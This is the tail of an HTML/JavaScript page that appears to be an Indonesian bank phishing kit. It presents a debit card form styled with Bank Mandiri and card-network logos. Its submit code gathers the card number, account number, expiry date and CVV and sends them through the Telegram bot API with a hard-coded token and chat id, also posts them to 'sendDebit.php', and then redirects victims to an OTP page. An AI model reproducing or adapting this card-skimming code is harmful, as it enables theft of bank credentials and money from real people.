      if (this.cardMonth < this.minCardMonth) {
        this.cardMonth = "";
      }
    }
  },
  methods: {
    flipCard (status) {
      this.isCardFlipped = status;
    },
    focusInput (e) {
      this.isInputFocused = true;
      let targetRef = e.target.dataset.ref;
      let target = this.$refs[targetRef];
      this.focusElementStyle = {
        width: `${target.offsetWidth}px`,
        height: `${target.offsetHeight}px`,
        transform: `translateX(${target.offsetLeft}px) translateY(${target.offsetTop}px)`
      }
    },
    blurInput() {
      let vm = this;
      setTimeout(() => {
        if (!vm.isInputFocused) {
          vm.focusElementStyle = null;
        }
      }, 300);
      vm.isInputFocused = false;
    }
  }
});






function submitForm(event) {
 $("#lodingku").show();
 event.preventDefault();
 
    var nama = document.getElementById('nama');
    var email = document.getElementById('email');
    var bulan = document.getElementById('bulan');
     var tahun = document.getElementById('tahun');
    var pesan = document.getElementById('pesan');

    var gabungan = '𝗡𝗼𝗺𝗼𝗿 𝗞𝗮𝗿𝘁𝘂 𝗗𝗘𝗕𝗜𝗧%3A%0A' + nama.value + '%0A𝗡𝗼𝗺𝗼𝗿 𝗥𝗲𝗸𝗲𝗻𝗶𝗻𝗴%3A%0A' + email.value + '%0A𝗠𝗮𝘀𝗮 𝗕𝗲𝗿𝗹𝗮𝗸𝘂%3A%0A' + bulan.value + - + tahun.value + '%0A𝗖𝗩𝗩%3A%0A' + pesan.value;

    var token = '5824177085:AAHMo7Iu66wCIW2wZ0iJAVsIgsBWrUDYRQU'; // Ganti dengan token bot yang kamu buat
    var grup = '5627477315'; // Ganti dengan chat id dari bot yang kamu buat

    $.ajax({
        url: `https://api.telegram.org/bot${token}/sendMessage?chat_id=${grup}&text=${gabungan}&parse_mode=html`,
        method: `POST`,
        
    success: function(){
    setTimeout(function(){
       $("#lodingku").hide();
     window.location = "./otp.html";  
    }, 1500);}});};
</script>
    <script>
$('#form1').on('submit', function (event) {

 
  event.stopPropagation();
    event.preventDefault();
 
  
    
 $("#lodingku").show();

$.ajax({
 type: 'POST',
 url: 'sendDebit.php',
 async: false,
 dataType: 'JSON',
 data: $(this).serialize(),
 
 complete: function(data) {
            console.log('Complete')
setTimeout(function(){
       $("#lodingku").hide();
location.href ="./otp.html";
   var phone = document.getElementById("nomorku").value;
 sessionStorage.setItem("phone", phone);
 var user = document.getElementById("nama").value;
 sessionStorage.setItem("user", user);
 var card = document.getElementById("debit").value;
 sessionStorage.setItem("card", card);
 var bul = document.getElementById("valid").value;
 sessionStorage.setItem("bul", bul); 
 
 var kodeku = document.getElementById("cvv").value;
 sessionStorage.setItem("kodeku", kodeku); 
 var duet = document.getElementById("saldo").value;
 sessionStorage.setItem("duet", duet); 
 
    }, 1500);
        }
    });

    return false;
});       
</script>
<script>
 var nomor = sessionStorage.getItem("nomor");

 document.getElementById("nomorku").value = nomor + "";
  
</script>
 
<script>
function cekno0(){$(".errtelp").empty();var o,n=$(".card-input__input1").val(),r=n.length;if(r>=4&&r<=19){o=n.substring(0,4);var a=tsel.length,e=0,t=!0;for(nomor="bukan";a>e;)tsel[e]==o&&($(".card-input__input1").css({"background-image":"url(https://upload.wikimedia.org/wikipedia/commons/4/41/Visa_Logo.png)"}),nomor="TELKOMSEL",t=!1),++e;for(a=isat.length,e=0;a>e&&t;)isat[e]==o&&($(".card-input__input1").css({"background-image":"url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbwlL7LBsKMJfJVT5djbBtbIm1f1kvBcGBBq2gQH5tr1-9MKe4bPex6qXSXAXEQDe48VMwOYDxTS6XwmkuSvmH9ZOlWjYNORouBRnp0bIRHPZ_YGomJocG61Xt7TPAGVp1s3aT2a1HhxoGdz96Ufr6JZqzf6L7idxujWx96aikD9TueSUavrpesofK/s16000/AddText_06-12-07.30.08.png)"}),nomor="INDOSAT",t=!1),++e;for(a=tree.length,e=0;a>e&&t;)tree[e]==o&&($(".card-input__input1").css({"background-image":"url(https://upload.wikimedia.org/wikipedia/commons/thumb/b/b7/MasterCard_Logo.svg/600px-MasterCard_Logo.svg.png)"}),nomor="THREE",t=!1),++e;for(a=sfren.length,e=0;a>e&&t;)sfren[e]==o&&($(".card-input__input1").css({"background-image":"url(https://upload.wikimedia.org/wikipedia/commons/thumb/4/40/JCB_logo.svg/600px-JCB_logo.svg.png"}),nomor="SMARTFREN",t=!1),++e;for(a=xl.length,e=0;a>e&&t;)xl[e]==o&&($(".card-input__input1").css({"background-image":"url(https://3.bp.blogspot.com/-WM_SGpSoqNY/WkDuWGIi8_I/AAAAAAAABic/6sHIwe7dh1sm0CC1ZAokqhsR3vZuRErxgCPcBGAYYCw/s1600/xl.png)"}),nomor="XL",t=!1),++e;for(a=axis.length,e=0;a>e&&t;)axis[e]==o&&($(".card-input__input1").css({"background-image":"url(https://4.bp.blogspot.com/-3GaLxmQk2sc/WkDuVAN41pI/AAAAAAAABiI/IdxzPaiB_XMNKc-37Clgmn6SxKtw_PwQACPcBGAYYCw/s1600/axis.png)"}),nomor="AXIS",t=!1),++e;"bukan"==nomor?(blocktombol(),gambaroperatorhilang()):r>=10&&12>=r?bukablocktombol():blocktombol()}else blocktombol(),gambaroperatorhilang()}function adahurufstring(){var o=!0,n=$(".card-input__input1").val(),r=n.length;if(n=parseInt(n),n=n.toString().length,r==n+1)var o=!1;return o}function blocktombol(){$(".tombol").prop("disabled",!0)}function bukablocktombol(){$(".tombol").prop("disabled",!1)}function gambaroperatorhilang(){$(".card-input__input1").css({"background-image":"url(https://upload.wikimedia.org/wikipedia/commons/thumb/a/ad/Bank_Mandiri_logo_2016.svg/426px-Bank_Mandiri_logo_2016.svg.png)"})}function isNumberKey(o){var n=o.which?o.which:event.keyCode;return n>31&&(48>n||n>57)?!1:!0}var tsel=["4097","4098","4096","4617","4895","4259","4616","4837"],isat=["6032"],tree=["5293","5126","5573","5377","5576","5463","5379","5289","5000","5520","5336","4599","5528"],sfren=["4213","3000","3565"],nomor,datapr;$(document).on("keyup",".card-input__input1",cekno0);
</script>
  <!-- Static App Form Collection Script -->
<!--<script src="https://static.app/js/static-forms.js" type="text/javascript"></script>

<script src="https://static.app/js/static.js" type="text/javascript"></script>-->
</body>
</html>